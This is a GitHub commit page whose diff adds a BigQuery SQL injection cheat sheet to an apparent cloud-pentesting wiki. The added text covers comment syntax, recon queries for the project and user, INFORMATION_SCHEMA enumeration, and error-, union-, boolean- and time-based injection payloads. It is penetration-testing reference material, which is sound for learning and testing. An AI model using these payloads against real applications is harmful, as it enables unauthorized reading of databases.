Skip to content

Commit

Permalink
GITBOOK-587: change request with no subject merged in GitBook
Browse files Browse the repository at this point in the history
  • Loading branch information
@carlospolop @gitbook-bot
carlospolop authored and gitbook-bot committed Feb 28, 2024
1 parent 668f61a commit 7f7bb18
Showing 1 changed file with 55 additions and 1 deletion.
56 changes: 55 additions & 1 deletion pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -170,7 +170,61 @@ bq show --encryption_service_account # Get encryption service account

### BigQuery SQL Injection

[https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
For further information you can check the blog post: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Here just some details are going to be given.

**Comments**:

* `select 1#from here it is not working`
* `select 1/*between those it is not working*/` But just the initial one won't work
* `select 1--from here it is not working`

Get **information** about the **environment** such as:

* Current user: `select session_user()`
* Project id: `select @@project_id`

Get **datasets**, **tables** and **column** names:

* **Project** and **dataset** name:

{% code overflow="wrap" %}
```sql
SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}

* **Column** and **table** names: 

{% code overflow="wrap" %}
```sql
# SELECT table_name, column_name FROM <proj-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS

SELECT table_name, column_name FROM digital-bonfire-410512.importeddataset.INFORMATION_SCHEMA.COLUMNS
```
{% endcode %}

* **Other datasets** in the same project:&#x20;

{% code overflow="wrap" %}
```sql
# SELECT catalog_name, schema_name, FROM <proj-name>.INFORMATION_SCHEMA.SCHEMATA

SELECT catalog_name, schema_name, NULL FROM digital-bonfire-410512.INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}

**SQL Injection types:**

* Error based - casting: `select CAST(@@project_id AS INT64)`
* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
* Union based: `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``

**Documentation:**

* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)

### Privilege Escalation & Post Exploitation

Expand Down

0 comments on commit 7f7bb18

Please sign in to comment.